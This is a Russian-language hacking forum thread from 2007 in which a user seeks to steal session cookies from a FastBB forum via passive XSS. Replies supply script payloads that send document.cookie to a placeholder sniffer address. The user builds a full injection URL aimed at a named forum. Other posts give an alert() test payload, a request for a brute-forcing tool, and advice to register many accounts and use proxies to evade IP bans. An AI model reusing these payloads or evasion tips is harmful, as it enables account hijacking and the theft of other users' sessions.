 |
|
23.01.2007, 23:49
|
|
Banned
Регистрация: 16.01.2007
Сообщений: 18
С нами:
10166662
Репутация:
-20
|
|
Сообщение от Fr-Ron
По теории вместо
alert()
ставишь
img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document .cookie;
Вот за это большущее спасибо
|
|
|
23.01.2007, 23:50
|
|
Banned
Регистрация: 16.01.2007
Сообщений: 18
С нами:
10166662
Репутация:
-20
|
|
Сообщение от goffog
<script language="JavaScript">aa1 = new Image(); aa1.src="Сниффер"+document.cookie;</script>
И тебе не меньше
|
|
|
|
24.01.2007, 16:31
|
|
Banned
Регистрация: 16.01.2007
Сообщений: 18
С нами:
10166662
Репутация:
-20
|
|
Супер-хакеры, а возможно пассивной Xss выманить не только айпишник но и кукисы. И еще, может кто-нибуть скажет мне, - есть програмка брутфорс для фастББ?
|
|
|
|
24.01.2007, 16:38
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
С нами:
10350730
Репутация:
337
|
|
Я далеко не супер-хакер, но отвечу на твой вопрос =)
С помощью пассивной хсс куки стырить можно. Та хсс, что ты показывал - это и есть пассивная. Смотри внимательней на запрос...
...+document.cookie
Короче то, что мы тебе с goffog сказали - это и тырит куки =)
ЗЫ Насчет брута - честно не знаю. Думаю почту побыстрей будет брутить  |
|
|
|
24.01.2007, 17:13
|
|
Banned
Регистрация: 16.01.2007
Сообщений: 18
С нами:
10166662
Репутация:
-20
|
|
а в фастББ значит ета Xss тоже стырит кука? Ели так, то я ОРУ от радости!
|
|
|
|
24.01.2007, 17:22
|
|
Banned
Регистрация: 16.01.2007
Сообщений: 18
С нами:
10166662
Репутация:
-20
|
|
Сообщение от Fr-Ron
По теории вместо
alert()
ставишь
img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document .cookie;
То есть запрос будет таков "><script>img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document .cookie;</script>
А вот если я хочу угнать куку с форума www.qwert.borda.ru то запрос мне нужно писать в таблицу
вот прямо так www.qwert.borda.ru/index.php/"><script>img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document .cookie;</script> если что не правильно поправте
|
|
|
|
24.01.2007, 19:58
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
С нами:
10350730
Репутация:
337
|
|
Гм, ты сказал поправить?.. Если бы все было так просто...
Почитай хотябы пару статей ачатовских про хсс, а то, я вижу, у тебя и представления нету об этом.
Коротко : XSS надо уметь внедрить. Вся суть заключается в том, что вредоносный код внедряется в код страницы, которую запрашивает жертва. Но для этого в фастбб ты должен найти уязвимое место, которое позволило бы это сделать. А вот когда найдешь уже все это дело, то тогда уже и строй запрос к сниферу. Для проверки юзай следующий код :
"><script>alert()</script>
Оно должно выдать алерт. В простонародии - окошко. =)
|
|
|
|
24.01.2007, 22:18
|
|
Новичок
Регистрация: 06.11.2005
Сообщений: 13
С нами:
10793921
Репутация:
1
|
|
Я с фастББ не знаком но думаю там тоже есть предварительный просмотр, тоесть смотришь теме что ниже, малехо изменяешь под себя скрипт, заливаешь куда-то и всовуешь жертве. Но админы быстренько все просекут и дадут БАН по АЙПИ, так что зареги по-больше акков и юзай прокси.
|
|
|
|
24.01.2007, 22:51
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
С нами:
10350730
Репутация:
337
|
|
goffog, слух, если не уверен, лучше не писать, а то в заблуждение некотыре входят
Кстати на фастбб применяется супербан.
И насчет предварительного просмотра - если он есть, то форум уязвим?  |
|
|
|
24.01.2007, 22:55
|
|
Новичок
Регистрация: 06.11.2005
Сообщений: 13
С нами:
10793921
Репутация:
1
|
|
Ну если супербан, то даже программка есть для его обхода, а как я понял, предварительный просмотр, если и есть, то можно стырить куки, а про уязвимости форума я ниче не говорил.
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Firewall: принцип работы
|
D=P=CH= MOD= |
Защита ОС: вирусы, антивирусы, файрволы. |
0 |
02.10.2006 22:36 |
|
Логи Сниффера
|
Jonathan Allen |
Болталка |
10 |
04.12.2005 20:47 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
